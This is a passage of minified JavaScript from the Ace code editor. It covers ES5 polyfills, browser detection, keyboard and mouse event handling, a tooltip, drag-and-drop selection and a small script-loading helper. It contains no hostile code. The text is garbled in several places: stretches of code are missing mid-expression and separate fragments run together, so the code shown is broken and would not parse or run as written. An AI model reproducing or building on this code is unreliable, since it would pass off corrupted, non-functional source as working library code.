in r){o=r[s++];break}if(++s>=i)throw new TypeError("reduce of empty array with no initial value")}while(!0);for(;s>>0;if(a(t)!="[object Function]")throw new TypeError(t+" is not a function");if(!i&&arguments.length==1)throw new TypeError("reduceRight of empty array with no initial value");var s,o=i-1;if(arguments.length>=2)s=arguments[1];else do{if(o in r){s=r[o--];break}if(--o<0)throw new TypeError("reduceRight of empty array with no initial value")}while(!0);do o in this&&(s=t.call(void 0,s,r[o],o,n));while(o--);return s});if(!Array.prototype.indexOf||[0,1].indexOf(1,2)!=-1)Array.prototype.indexOf=function(t){var n=g&&a(this)=="[object String]"?this.split(""):F(this),r=n.length>>>0;if(!r)return-1;var i=0;arguments.length>1&&(i=H(arguments[1])),i=i>=0?i:Math.max(0,r+i);for(;i>>0;if(!r)return-1;var i=r-1;arguments.length>1&&(i=Math.min(i,H(arguments[1]))),i=i>=0?i:r-Math.abs(i);for(;i>=0;i--)if(i in n&&t===n[i])return i;return-1};Object.getPrototypeOf||(Object.getPrototypeOf=function(t){return t.__proto__||(t.constructor?t.constructor.prototype:o)});if(!Object.getOwnPropertyDescriptor){var y="Object.getOwnPropertyDescriptor called on a non-object: ";Object.getOwnPropertyDescriptor=function(t,n){if(typeof t!="object"&&typeof t!="function"||t===null)throw new TypeError(y+t);if(!f(t,n))return;var r,i,s;r={enumerable:!0,configurable:!0};if(d){var u=t.__proto__;t.__proto__=o;var i=h(t,n),s=p(t,n);t.__proto__=u;if(i||s)return i&&(r.get=i),s&&(r.set=s),r}return r.value=t[n],r}}Object.getOwnPropertyNames||(Object.getOwnPropertyNames=function(t){return Object.keys(t)});if(!Object.create){var b;Object.prototype.__proto__===null?b=function(){return{__proto__:null}}:b=function(){var e={};for(var t in e)e[t]=null;return e.constructor=e.hasOwnProperty=e.propertyIsEnumerable=e.isPrototypeOf=e.toLocaleString=e.toString=e.valueOf=e.__proto__=null,e},Object.create=function(t,n){var r;if(t===null)r=b();else{if(typeof t!="object")throw new TypeError("typeof prototype["+typeof t+"] != 'object'");var i=function(){};i.prototype=t,r=new i,r.__proto__=t}return n!==void 0&&Object.defineProperties(r,n),r}}if(Object.defineProperty){var E=w({}),S=typeof document=="undefined"||w(document.createElement("div"));if(!E||!S)var x=Object.defineProperty}if(!Object.defineProperty||x){var T="Property description must be an object: ",N="Object.defineProperty called on non-object: ",C="getters & setters can not be defined on this javascript engine";Object.defineProperty=function(t,n,r){if(typeof t!="object"&&typeof t!="function"||t===null)throw new TypeError(N+t);if(typeof r!="object"&&typeof r!="function"||r===null)throw new TypeError(T+r);if(x)try{return x.call(Object,t,n,r)}catch(i){}if(f(r,"value"))if(d&&(h(t,n)||p(t,n))){var s=t.__proto__;t.__proto__=o,delete t[n],t[n]=r.value,t.__proto__=s}else t[n]=r.value;else{if(!d)throw new TypeError(C);f(r,"get")&&l(t,n,r.get),f(r,"set")&&c(t,n,r.set)}return t}}Object.defineProperties||(Object.defineProperties=function(t,n){for(var r in n)f(n,r)&&Object.defineProperty(t,r,n[r]);return t}),Object.seal||(Object.seal=function(t){return t}),Object.freeze||(Object.freeze=function(t){return t});try{Object.freeze(function(){})}catch(k){Object.freeze=function(t){return function(n){return typeof n=="function"?n:t(n)}}(Object.freeze)}Object.preventExtensions||(Object.preventExtensions=function(t){return t}),Object.isSealed||(Object.isSealed=function(t){return!1}),Object.isFrozen||(Object.isFrozen=function(t){return!1}),Object.isExtensible||(Object.isExtensible=function(t){if(Object(t)===t)throw new TypeError;var n="";while(f(t,n))n+="?";t[n]=!0;var r=f(t,n);return delete t[n],r});if(!Object.keys){var L=!0,A=["toString","toLocaleString","valueOf","hasOwnProperty","isPrototypeOf","propertyIsEnumerable","constructor"],O=A.length;for(var M in{toString:null})L=!1;Object.keys=function I(e){if(typeof e!="object"&&typeof e!="function"||e===null)throw new TypeError("Object.keys called on a non-object");var I=[];for(var t in e)f(e,t)&&I.push(t);if(L)for(var n=0,r=O;n=0?parseFloat((i.match(/(?:MSIE |Trident\/[0-9]+[\.0-9]+;.*rv:)([0-9]+[\.0-9]+)/)||[])[1]):parseFloat((i.match(/(?:Trident\/[0-9]+[\.0-9]+;.*rv:)([0-9]+[\.0-9]+)/)||[])[1]),t.isOldIE=t.isIE&&t.isIE<9,t.isGecko=t.isMozilla=(window.Controllers||window.controllers)&&window.navigator.product==="Gecko",t.isOldGecko=t.isGecko&&parseInt((i.match(/rv:(\d+)/)||[])[1],10)<4,t.isOpera=window.opera&&Object.prototype.toString.call(window.opera)=="[object Opera]",t.isWebKit=parseFloat(i.split("WebKit/")[1])||undefined,t.isChrome=parseFloat(i.split(" Chrome/")[1])||undefined,t.isAIR=i.indexOf("AdobeAIR")>=0,t.isIPad=i.indexOf("iPad")>=0,t.isTouchPad=i.indexOf("TouchPad")>=0,t.isChromeOS=i.indexOf(" CrOS ")>=0}),ace.define("ace/lib/event",["require","exports","module","ace/lib/keys","ace/lib/useragent"],function(e,t,n){"use strict";function a(e,t,n){var a=u(t);if(!i.isMac&&s){t.getModifierState&&(t.getModifierState("OS")||t.getModifierState("Win"))&&(a|=8);if(s.altGr){if((3&a)==3)return;s.altGr=0}if(n===18||n===17){var f="location"in t?t.location:t.keyLocation;if(n===17&&f===1)s[n]==1&&(o=t.timeStamp);else if(n===18&&a===3&&f===2){var l=t.timeStamp-o;l<50&&(s.altGr=!0)}}}n in r.MODIFIER_KEYS&&(n=-1),a&8&&n>=91&&n<=93&&(n=-1);if(!a&&n===13){var f="location"in t?t.location:t.keyLocation;if(f===3){e(t,a,-n);if(t.defaultPrevented)return}}if(i.isChromeOS&&a&8){e(t,a,n);if(t.defaultPrevented)return;a&=-9}return!!a||n in r.FUNCTION_KEYS||n in r.PRINTABLE_KEYS?e(t,a,n):!1}function f(){s=Object.create(null)}var r=e("./keys"),i=e("./useragent"),s=null,o=0;t.addListener=function(e,t,n){if(e.addEventListener)return e.addEventListener(t,n,!1);if(e.attachEvent){var r=function(){n.call(e,window.event)};n._wrapper=r,e.attachEvent("on"+t,r)}},t.removeListener=function(e,t,n){if(e.removeEventListener)return e.removeEventListener(t,n,!1);e.detachEvent&&e.detachEvent("on"+t,n._wrapper||n)},t.stopEvent=function(e){return t.stopPropagation(e),t.preventDefault(e),!1},t.stopPropagation=function(e){e.stopPropagation?e.stopPropagation():e.cancelBubble=!0},t.preventDefault=function(e){e.preventDefault?e.preventDefault():e.returnValue=!1},t.getButton=function(e){return e.type=="dblclick"?0:e.type=="contextmenu"||i.isMac&&e.ctrlKey&&!e.altKey&&!e.shiftKey?2:e.preventDefault?e.button:{1:0,2:2,4:1}[e.button]},t.capture=function(e,n,r){function i(e){n&&n(e),r&&r(e),t.removeListener(document,"mousemove",n,!0),t.removeListener(document,"mouseup",i,!0),t.removeListener(document,"dragstart",i,!0)}return t.addListener(document,"mousemove",n,!0),t.addListener(document,"mouseup",i,!0),t.addListener(document,"dragstart",i,!0),i},t.addTouchMoveListener=function(e,n){if("ontouchmove"in e){var r,i;t.addListener(e,"touchstart",function(e){var t=e.changedTouches[0];r=t.clientX,i=t.clientY}),t.addListener(e,"touchmove",function(e){var t=1,s=e.changedTouches[0];e.wheelX=-(s.clientX-r)/t,e.wheelY=-(s.clientY-i)/t,r=s.clientX,i=s.clientY,n(e)})}},t.addMouseWheelListener=function(e,n){"onmousewheel"in e?t.addListener(e,"mousewheel",function(e){var t=8;e.wheelDeltaX!==undefined?(e.wheelX=-e.wheelDeltaX/t,e.wheelY=-e.wheelDeltaY/t):(e.wheelX=0,e.wheelY=-e.wheelDelta/t),n(e)}):"onwheel"in e?t.addListener(e,"wheel",function(e){var t=.35;switch(e.deltaMode){case e.DOM_DELTA_PIXEL:e.wheelX=e.deltaX*t||0,e.wheelY=e.deltaY*t||0;break;case e.DOM_DELTA_LINE:case e.DOM_DELTA_PAGE:e.wheelX=(e.deltaX||0)*5,e.wheelY=(e.deltaY||0)*5}n(e)}):t.addListener(e,"DOMMouseScroll",function(e){e.axis&&e.axis==e.HORIZONTAL_AXIS?(e.wheelX=(e.detail||0)*5,e.wheelY=0):(e.wheelX=0,e.wheelY=(e.detail||0)*5),n(e)})},t.addMultiMouseDownListener=function(e,n,r,s){function c(e){t.getButton(e)!==0?o=0:e.detail>1?(o++,o>4&&(o=1)):o=1;if(i.isIE){var c=Math.abs(e.clientX-u)>5||Math.abs(e.clientY-a)>5;if(!f||c)o=1;f&&clearTimeout(f),f=setTimeout(function(){f=null},n[o-1]||600),o==1&&(u=e.clientX,a=e.clientY)}e._clicks=o,r[s]("mousedown",e);if(o>4)o=0;else if(o>1)return r[s](l[o],e)}function h(e){o=2,f&&clearTimeout(f),f=setTimeout(function(){f=null},n[o-1]||600),r[s]("mousedown",e),r[s](l[o],e)}var o=0,u,a,f,l={2:"dblclick",3:"tripleclick",4:"quadclick"};Array.isArray(e)||(e=[e]),e.forEach(function(e){t.addListener(e,"mousedown",c),i.isOldIE&&t.addListener(e,"dblclick",h)})};var u=!i.isMac||!i.isOpera||"KeyboardEvent"in window?function(e){return 0|(e.ctrlKey?1:0)|(e.altKey?2:0)|(e.shiftKey?4:0)|(e.metaKey?8:0)}:function(e){return 0|(e.metaKey?1:0)|(e.altKey?2:0)|(e.shiftKey?4:0)|(e.ctrlKey?8:0)};t.getModifierString=function(e){return r.KEY_MODS[u(e)]},t.addCommandKeyListener=function(e,n){var r=t.addListener;if(i.isOldGecko||i.isOpera&&!("KeyboardEvent"in window)){var o=null;r(e,"keydown",function(e){o=e.keyCode}),r(e,"keypress",function(e){return a(n,e,o)})}else{var u=null;r(e,"keydown",function(e){s[e.keyCode]=(s[e.keyCode]||0)+1;var t=a(n,e,e.keyCode);return u=e.defaultPrevented,t}),r(e,"keypress",function(e){u&&(e.ctrlKey||e.altKey||e.shiftKey||e.metaKey)&&(t.stopEvent(e),u=null)}),r(e,"keyup",function(e){s[e.keyCode]=null}),s||(f(),r(window,"focus",f))}};if(typeof window=="object"&&window.postMessage&&!i.isOldIE){var l=1;t.nextTick=function(e,n){n=n||window;var r="zero-timeout-message-"+l;t.addListener(n,"message",function i(s){s.data==r&&(t.stopPropagation(s),t.removeListener(n,"message",i),e())}),n.postMessage(r,"*")}}t.nextFrame=typeof window=="object"&&(window.requestAnimationFrame||window.mozRequestAnimationFrame||window.webkitRequestAnimationFrame||window.msRequestAnimationFrame||window.oRequestAnimationFrame),t.nextFrame?t.nextFrame=t.nextFrame.bind(window):t.nextFrame=function(e){setTimeout(e,17)}}),ace.define("ace/lib/lang",["require","exports","module"],function(e,t,n){"use strict";t.last=function(e){return e[e.length-1]},t.stringReverse=function(e){return e.split("").reverse().join("")},t.stringRepeat=function(e,t){var n="";while(t>0){t&1&&(n+=e);if(t>>=1)e+=e}return n};var r=/^\s\s*/,i=/\s\s*$/;t.stringTrimLeft=function(e){return e.replace(r,"")},t.stringTrimRight=function(e){return e.replace(i,"")},t.copyObject=function(e){var t={};for(var n in e)t[n]=e[n];return t},t.copyArray=function(e){var t=[];for(var n=0,r=e.length;n=53&&O(),i.isIE&&O()},I=o.delayedCall(j,50);r.addListener(n,"compositionstart",B),i.isGecko?r.addListener(n,"text",function(){I.schedule()}):(r.addListener(n,"keyup",function(){I.schedule()}),r.addListener(n,"keydown",function(){I.schedule()})),r.addListener(n,"compositionend",F),this.getElement=function(){return n},this.setReadOnly=function(e){n.readOnly=e},this.onContextMenu=function(e){L=!0,b(t.selection.isEmpty()),t._emit("nativecontextmenu",{target:t,domEvent:e}),this.moveToMouse(e,!0)},this.moveToMouse=function(e,o){if(!o&&i.isOldIE)return;p||(p=n.style.cssText),n.style.cssText=(o?"z-index:100000;":"")+"height:"+n.style.height+";"+(i.isIE?"opacity:0.1;":"");var u=t.container.getBoundingClientRect(),a=s.computedStyle(t.container),f=u.top+(parseInt(a.borderTopWidth)||0),l=u.left+(parseInt(u.borderLeftWidth)||0),c=u.bottom-f-n.clientHeight-2,h=function(e){n.style.left=e.clientX-l-2+"px",n.style.top=Math.min(e.clientY-f-2,c)+"px"};h(e);if(e.type!="mousedown")return;t.renderer.$keepTextAreaAtCursor&&(t.renderer.$keepTextAreaAtCursor=null),clearTimeout(q),i.isWin&&!i.isOldIE&&r.capture(t.container,h,R)},this.onContextMenuClose=R;var q,U=function(e){t.textInput.onContextMenu(e),R()};r.addListener(n,"mouseup",U),r.addListener(n,"mousedown",function(e){e.preventDefault(),R()}),r.addListener(t.renderer.scroller,"contextmenu",U),r.addListener(n,"contextmenu",U)};t.TextInput=f}),ace.define("ace/mouse/default_handlers",["require","exports","module","ace/lib/dom","ace/lib/event","ace/lib/useragent"],function(e,t,n){"use strict";function u(e){e.$clickSelection=null;var t=e.editor;t.setDefaultHandler("mousedown",this.onMouseDown.bind(e)),t.setDefaultHandler("dblclick",this.onDoubleClick.bind(e)),t.setDefaultHandler("tripleclick",this.onTripleClick.bind(e)),t.setDefaultHandler("quadclick",this.onQuadClick.bind(e)),t.setDefaultHandler("mousewheel",this.onMouseWheel.bind(e)),t.setDefaultHandler("touchmove",this.onTouchMove.bind(e));var n=["select","startSelect","selectEnd","selectAllEnd","selectByWordsEnd","selectByLinesEnd","dragWait","dragWaitEnd","focusWait"];n.forEach(function(t){e[t]=this[t]},this),e.selectByLines=this.extendSelectionBy.bind(e,"getLineRange"),e.selectByWords=this.extendSelectionBy.bind(e,"getWordRange")}function a(e,t,n,r){return Math.sqrt(Math.pow(n-e,2)+Math.pow(r-t,2))}function f(e,t){if(e.start.row==e.end.row)var n=2*t.column-e.start.column-e.end.column;else if(e.start.row==e.end.row-1&&!e.start.column&&!e.end.column)var n=t.column-4;else var n=2*t.row-e.start.row-e.end.row;return n<0?{cursor:e.start,anchor:e.end}:{cursor:e.end,anchor:e.start}}var r=e("../lib/dom"),i=e("../lib/event"),s=e("../lib/useragent"),o=0;(function(){this.onMouseDown=function(e){var t=e.inSelection(),n=e.getDocumentPosition();this.mousedownEvent=e;var r=this.editor,i=e.getButton();if(i!==0){var s=r.getSelectionRange(),o=s.isEmpty();r.$blockScrolling++,(o||i==1)&&r.selection.moveToPosition(n),r.$blockScrolling--,i==2&&r.textInput.onContextMenu(e.domEvent);return}this.mousedownEvent.time=Date.now();if(t&&!r.isFocused()){r.focus();if(this.$focusTimout&&!this.$clickSelection&&!r.inMultiSelectMode){this.setState("focusWait"),this.captureMouse(e);return}}return this.captureMouse(e),this.startSelect(n,e.domEvent._clicks>1),e.preventDefault()},this.startSelect=function(e,t){e=e||this.editor.renderer.screenToTextCoordinates(this.x,this.y);var n=this.editor;n.$blockScrolling++,this.mousedownEvent.getShiftKey()?n.selection.selectToPosition(e):t||n.selection.moveToPosition(e),t||this.select(),n.renderer.scroller.setCapture&&n.renderer.scroller.setCapture(),n.setStyle("ace_selecting"),this.setState("select"),n.$blockScrolling--},this.select=function(){var e,t=this.editor,n=t.renderer.screenToTextCoordinates(this.x,this.y);t.$blockScrolling++;if(this.$clickSelection){var r=this.$clickSelection.comparePoint(n);if(r==-1)e=this.$clickSelection.end;else if(r==1)e=this.$clickSelection.start;else{var i=f(this.$clickSelection,n);n=i.cursor,e=i.anchor}t.selection.setSelectionAnchor(e.row,e.column)}t.selection.selectToPosition(n),t.$blockScrolling--,t.renderer.scrollCursorIntoView()},this.extendSelectionBy=function(e){var t,n=this.editor,r=n.renderer.screenToTextCoordinates(this.x,this.y),i=n.selection[e](r.row,r.column);n.$blockScrolling++;if(this.$clickSelection){var s=this.$clickSelection.comparePoint(i.start),o=this.$clickSelection.comparePoint(i.end);if(s==-1&&o<=0){t=this.$clickSelection.end;if(i.end.row!=r.row||i.end.column!=r.column)r=i.start}else if(o==1&&s>=0){t=this.$clickSelection.start;if(i.start.row!=r.row||i.start.column!=r.column)r=i.end}else if(s==-1&&o==1)r=i.end,t=i.start;else{var u=f(this.$clickSelection,r);r=u.cursor,t=u.anchor}n.selection.setSelectionAnchor(t.row,t.column)}n.selection.selectToPosition(r),n.$blockScrolling--,n.renderer.scrollCursorIntoView()},this.selectEnd=this.selectAllEnd=this.selectByWordsEnd=this.selectByLinesEnd=function(){this.$clickSelection=null,this.editor.unsetStyle("ace_selecting"),this.editor.renderer.scroller.releaseCapture&&this.editor.renderer.scroller.releaseCapture()},this.focusWait=function(){var e=a(this.mousedownEvent.x,this.mousedownEvent.y,this.x,this.y),t=Date.now();(e>o||t-this.mousedownEvent.time>this.$focusTimout)&&this.startSelect(this.mousedownEvent.getDocumentPosition())},this.onDoubleClick=function(e){var t=e.getDocumentPosition(),n=this.editor,r=n.session,i=r.getBracketRange(t);i?(i.isEmpty()&&(i.start.column--,i.end.column++),this.setState("select")):(i=n.selection.getWordRange(t.row,t.column),this.setState("selectByWords")),this.$clickSelection=i,this.select()},this.onTripleClick=function(e){var t=e.getDocumentPosition(),n=this.editor;this.setState("selectByLines");var r=n.getSelectionRange();r.isMultiLine()&&r.contains(t.row,t.column)?(this.$clickSelection=n.selection.getLineRange(r.start.row),this.$clickSelection.end=n.selection.getLineRange(r.end.row).end):this.$clickSelection=n.selection.getLineRange(t.row),this.select()},this.onQuadClick=function(e){var t=this.editor;t.selectAll(),this.$clickSelection=t.getSelectionRange(),this.setState("selectAll")},this.onMouseWheel=function(e){if(e.getAccelKey())return;e.getShiftKey()&&e.wheelY&&!e.wheelX&&(e.wheelX=e.wheelY,e.wheelY=0);var t=e.domEvent.timeStamp,n=t-(this.$lastScrollTime||0),r=this.editor,i=r.renderer.isScrollableBy(e.wheelX*e.speed,e.wheelY*e.speed);if(i||n<200)return this.$lastScrollTime=t,r.renderer.scrollBy(e.wheelX*e.speed,e.wheelY*e.speed),e.stop()},this.onTouchMove=function(e){var t=e.domEvent.timeStamp,n=t-(this.$lastScrollTime||0),r=this.editor,i=r.renderer.isScrollableBy(e.wheelX*e.speed,e.wheelY*e.speed);if(i||n<200)return this.$lastScrollTime=t,r.renderer.scrollBy(e.wheelX*e.speed,e.wheelY*e.speed),e.stop()}}).call(u.prototype),t.DefaultHandlers=u}),ace.define("ace/tooltip",["require","exports","module","ace/lib/oop","ace/lib/dom"],function(e,t,n){"use strict";function s(e){this.isOpen=!1,this.$element=null,this.$parentNode=e}var r=e("./lib/oop"),i=e("./lib/dom");(function(){this.$init=function(){return this.$element=i.createElement("div"),this.$element.className="ace_tooltip",this.$element.style.display="none",this.$parentNode.appendChild(this.$element),this.$element},this.getElement=function(){return this.$element||this.$init()},this.setText=function(e){i.setInnerText(this.getElement(),e)},this.setHtml=function(e){this.getElement().innerHTML=e},this.setPosition=function(e,t){this.getElement().style.left=e+"px",this.getElement().style.top=t+"px"},this.setClassName=function(e){i.addCssClass(this.getElement(),e)},this.show=function(e,t,n){e!=null&&this.setText(e),t!=null&&n!=null&&this.setPosition(t,n),this.isOpen||(this.getElement().style.display="block",this.isOpen=!0)},this.hide=function(){this.isOpen&&(this.getElement().style.display="none",this.isOpen=!1)},this.getHeight=function(){return this.getElement().offsetHeight},this.getWidth=function(){return this.getElement().offsetWidth}}).call(s.prototype),t.Tooltip=s}),ace.define("ace/mouse/default_gutter_handler",["require","exports","module","ace/lib/dom","ace/lib/oop","ace/lib/event","ace/tooltip"],function(e,t,n){"use strict";function u(e){function l(){var r=u.getDocumentPosition().row,s=n.$annotations[r];if(!s)return c();var o=t.session.getLength();if(r==o){var a=t.renderer.pixelToScreenCoordinates(0,u.y).row,l=u.$pos;if(a>t.session.documentToScreenRow(l.row,l.column))return c()}if(f==s)return;f=s.text.join("
      "),i.setHtml(f),i.show(),t._signal("showGutterTooltip",i),t.on("mousewheel",c);if(e.$tooltipFollowsMouse)h(u);else{var p=u.domEvent.target,d=p.getBoundingClientRect(),v=i.getElement().style;v.left=d.right+"px",v.top=d.bottom+"px"}}function c(){o&&(o=clearTimeout(o)),f&&(i.hide(),f=null,t._signal("hideGutterTooltip",i),t.removeEventListener("mousewheel",c))}function h(e){i.setPosition(e.x,e.y)}var t=e.editor,n=t.renderer.$gutterLayer,i=new a(t.container);e.editor.setDefaultHandler("guttermousedown",function(r){if(!t.isFocused()||r.getButton()!=0)return;var i=n.getRegion(r);if(i=="foldWidgets")return;var s=r.getDocumentPosition().row,o=t.session.selection;if(r.getShiftKey())o.selectTo(s,0);else{if(r.domEvent.detail==2)return t.selectAll(),r.preventDefault();e.$clickSelection=t.selection.getLineRange(s)}return e.setState("selectByLines"),e.captureMouse(r),r.preventDefault()});var o,u,f;e.editor.setDefaultHandler("guttermousemove",function(t){var n=t.domEvent.target||t.domEvent.srcElement;if(r.hasCssClass(n,"ace_fold-widget"))return c();f&&e.$tooltipFollowsMouse&&h(t),u=t;if(o)return;o=setTimeout(function(){o=null,u&&!e.isMousePressed?l():c()},50)}),s.addListener(t.renderer.$gutter,"mouseout",function(e){u=null;if(!f||o)return;o=setTimeout(function(){o=null,c()},50)}),t.on("changeSession",c)}function a(e){o.call(this,e)}var r=e("../lib/dom"),i=e("../lib/oop"),s=e("../lib/event"),o=e("../tooltip").Tooltip;i.inherits(a,o),function(){this.setPosition=function(e,t){var n=window.innerWidth||document.documentElement.clientWidth,r=window.innerHeight||document.documentElement.clientHeight,i=this.getWidth(),s=this.getHeight();e+=15,t+=15,e+i>n&&(e-=e+i-n),t+s>r&&(t-=20+s),o.prototype.setPosition.call(this,e,t)}}.call(a.prototype),t.GutterHandler=u}),ace.define("ace/mouse/mouse_event",["require","exports","module","ace/lib/event","ace/lib/useragent"],function(e,t,n){"use strict";var r=e("../lib/event"),i=e("../lib/useragent"),s=t.MouseEvent=function(e,t){this.domEvent=e,this.editor=t,this.x=this.clientX=e.clientX,this.y=this.clientY=e.clientY,this.$pos=null,this.$inSelection=null,this.propagationStopped=!1,this.defaultPrevented=!1};(function(){this.stopPropagation=function(){r.stopPropagation(this.domEvent),this.propagationStopped=!0},this.preventDefault=function(){r.preventDefault(this.domEvent),this.defaultPrevented=!0},this.stop=function(){this.stopPropagation(),this.preventDefault()},this.getDocumentPosition=function(){return this.$pos?this.$pos:(this.$pos=this.editor.renderer.screenToTextCoordinates(this.clientX,this.clientY),this.$pos)},this.inSelection=function(){if(this.$inSelection!==null)return this.$inSelection;var e=this.editor,t=e.getSelectionRange();if(t.isEmpty())this.$inSelection=!1;else{var n=this.getDocumentPosition();this.$inSelection=t.contains(n.row,n.column)}return this.$inSelection},this.getButton=function(){return r.getButton(this.domEvent)},this.getShiftKey=function(){return this.domEvent.shiftKey},this.getAccelKey=i.isMac?function(){return this.domEvent.metaKey}:function(){return this.domEvent.ctrlKey}}).call(s.prototype)}),ace.define("ace/mouse/dragdrop_handler",["require","exports","module","ace/lib/dom","ace/lib/event","ace/lib/useragent"],function(e,t,n){"use strict";function f(e){function T(e,n){var r=Date.now(),i=!n||e.row!=n.row,s=!n||e.column!=n.column;if(!S||i||s)t.$blockScrolling+=1,t.moveCursorToPosition(e),t.$blockScrolling-=1,S=r,x={x:p,y:d};else{var o=l(x.x,x.y,p,d);o>a?S=null:r-S>=u&&(t.renderer.scrollCursorIntoView(),S=null)}}function N(e,n){var r=Date.now(),i=t.renderer.layerConfig.lineHeight,s=t.renderer.layerConfig.characterWidth,u=t.renderer.scroller.getBoundingClientRect(),a={x:{left:p-u.left,right:u.right-p},y:{top:d-u.top,bottom:u.bottom-d}},f=Math.min(a.x.left,a.x.right),l=Math.min(a.y.top,a.y.bottom),c={row:e.row,column:e.column};f/s<=2&&(c.column+=a.x.left=o&&t.renderer.scrollCursorIntoView(c):E=r:E=null}function C(){var e=g;g=t.renderer.screenToTextCoordinates(p,d),T(g,e),N(g,e)}function k(){m=t.selection.toOrientedRange(),h=t.session.addMarker(m,"ace_selection",t.getSelectionStyle()),t.clearSelection(),t.isFocused()&&t.renderer.$cursorLayer.setBlinking(!1),clearInterval(v),C(),v=setInterval(C,20),y=0,i.addListener(document,"mousemove",O)}function L(){clearInterval(v),t.session.removeMarker(h),h=null,t.$blockScrolling+=1,t.selection.fromOrientedRange(m),t.$blockScrolling-=1,t.isFocused()&&!w&&t.renderer.$cursorLayer.setBlinking(!t.getReadOnly()),m=null,g=null,y=0,E=null,S=null,i.removeListener(document,"mousemove",O)}function O(){A==null&&(A=setTimeout(function(){A!=null&&h&&L()},20))}function M(e){var t=e.types;return!t||Array.prototype.some.call(t,function(e){return e=="text/plain"||e=="Text"})}function _(e){var t=["copy","copymove","all","uninitialized"],n=["move","copymove","linkmove","all","uninitialized"],r=s.isMac?e.altKey:e.ctrlKey,i="uninitialized";try{i=e.dataTransfer.effectAllowed.toLowerCase()}catch(e){}var o="none";return r&&t.indexOf(i)>=0?o="copy":n.indexOf(i)>=0?o="move":t.indexOf(i)>=0&&(o="copy"),o}var t=e.editor,n=r.createElement("img");n.src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==",s.isOpera&&(n.style.cssText="width:1px;height:1px;position:fixed;top:0;left:0;z-index:2147483647;opacity:0;");var f=["dragWait","dragWaitEnd","startDrag","dragReadyEnd","onMouseDrag"];f.forEach(function(t){e[t]=this[t]},this),t.addEventListener("mousedown",this.onMouseDown.bind(e));var c=t.container,h,p,d,v,m,g,y=0,b,w,E,S,x;this.onDragStart=function(e){if(this.cancelDrag||!c.draggable){var r=this;return setTimeout(function(){r.startSelect(),r.captureMouse(e)},0),e.preventDefault()}m=t.getSelectionRange();var i=e.dataTransfer;i.effectAllowed=t.getReadOnly()?"copy":"copyMove",s.isOpera&&(t.container.appendChild(n),n.scrollTop=0),i.setDragImage&&i.setDragImage(n,0,0),s.isOpera&&t.container.removeChild(n),i.clearData(),i.setData("Text",t.session.getTextRange()),w=!0,this.setState("drag")},this.onDragEnd=function(e){c.draggable=!1,w=!1,this.setState(null);if(!t.getReadOnly()){var n=e.dataTransfer.dropEffect;!b&&n=="move"&&t.session.remove(t.getSelectionRange()),t.renderer.$cursorLayer.setBlinking(!0)}this.editor.unsetStyle("ace_dragging"),this.editor.renderer.setCursorStyle("")},this.onDragEnter=function(e){if(t.getReadOnly()||!M(e.dataTransfer))return;return p=e.clientX,d=e.clientY,h||k(),y++,e.dataTransfer.dropEffect=b=_(e),i.preventDefault(e)},this.onDragOver=function(e){if(t.getReadOnly()||!M(e.dataTransfer))return;return p=e.clientX,d=e.clientY,h||(k(),y++),A!==null&&(A=null),e.dataTransfer.dropEffect=b=_(e),i.preventDefault(e)},this.onDragLeave=function(e){y--;if(y<=0&&h)return L(),b=null,i.preventDefault(e)},this.onDrop=function(e){if(!g)return;var n=e.dataTransfer;if(w)switch(b){case"move":m.contains(g.row,g.column)?m={start:g,end:g}:m=t.moveText(m,g);break;case"copy":m=t.moveText(m,g,!0)}else{var r=n.getData("Text");m={start:g,end:t.session.insert(g,r)},t.focus(),b=null}return L(),i.preventDefault(e)},i.addListener(c,"dragstart",this.onDragStart.bind(e)),i.addListener(c,"dragend",this.onDragEnd.bind(e)),i.addListener(c,"dragenter",this.onDragEnter.bind(e)),i.addListener(c,"dragover",this.onDragOver.bind(e)),i.addListener(c,"dragleave",this.onDragLeave.bind(e)),i.addListener(c,"drop",this.onDrop.bind(e));var A=null}function l(e,t,n,r){return Math.sqrt(Math.pow(n-e,2)+Math.pow(r-t,2))}var r=e("../lib/dom"),i=e("../lib/event"),s=e("../lib/useragent"),o=200,u=200,a=5;(function(){this.dragWait=function(){var e=Date.now()-this.mousedownEvent.time;e>this.editor.getDragDelay()&&this.startDrag()},this.dragWaitEnd=function(){var e=this.editor.container;e.draggable=!1,this.startSelect(this.mousedownEvent.getDocumentPosition()),this.selectEnd()},this.dragReadyEnd=function(e){this.editor.renderer.$cursorLayer.setBlinking(!this.editor.getReadOnly()),this.editor.unsetStyle("ace_dragging"),this.editor.renderer.setCursorStyle(""),this.dragWaitEnd()},this.startDrag=function(){this.cancelDrag=!1;var e=this.editor,t=e.container;t.draggable=!0,e.renderer.$cursorLayer.setBlinking(!1),e.setStyle("ace_dragging");var n=s.isWin?"default":"move";e.renderer.setCursorStyle(n),this.setState("dragReady")},this.onMouseDrag=function(e){var t=this.editor.container;if(s.isIE&&this.state=="dragReady"){var n=l(this.mousedownEvent.x,this.mousedownEvent.y,this.x,this.y);n>3&&t.dragDrop()}if(this.state==="dragWait"){var n=l(this.mousedownEvent.x,this.mousedownEvent.y,this.x,this.y);n>0&&(t.draggable=!1,this.startSelect(this.mousedownEvent.getDocumentPosition()))}},this.onMouseDown=function(e){if(!this.$dragEnabled)return;this.mousedownEvent=e;var t=this.editor,n=e.inSelection(),r=e.getButton(),i=e.domEvent.detail||1;if(i===1&&r===0&&n){if(e.editor.inMultiSelectMode&&(e.getAccelKey()||e.getShiftKey()))return;this.mousedownEvent.time=Date.now();var o=e.domEvent.target||e.domEvent.srcElement;"unselectable"in o&&(o.unselectable="on");if(t.getDragDelay()){if(s.isWebKit){this.cancelDrag=!0;var u=t.container;u.draggable=!0}this.setState("dragWait")}else this.startDrag();this.captureMouse(e,this.onMouseDrag.bind(this)),e.defaultPrevented=!0}}}).call(f.prototype),t.DragdropHandler=f}),ace.define("ace/lib/net",["require","exports","module","ace/lib/dom"],function(e,t,n){"use strict";var r=e("./dom");t.get=function(e,t){var n=new XMLHttpRequest;n.open("GET",e,!0),n.onreadystatechange=function(){n.readyState===4&&t(n.responseText)},n.send(null)},t.loadScript=function(e,t){var n=r.getDocumentHead(),i=document.createElement("script");i.src=e,n.appendChild(i),i.onload=i.onreadystatechange=function(e,n){if(n||!i.readyState||i.readyState=="loaded"||i.readyState=="complete")i=i.onload=i.onreadystatechange=null,n||t()}},t.qualifyURL=function(e){var t=document.createElement("a");return t.href=e,t.href}}),ace.define("ace/lib/event_emitter",["require","exports","module"],function(e,t,n){"use strict";var 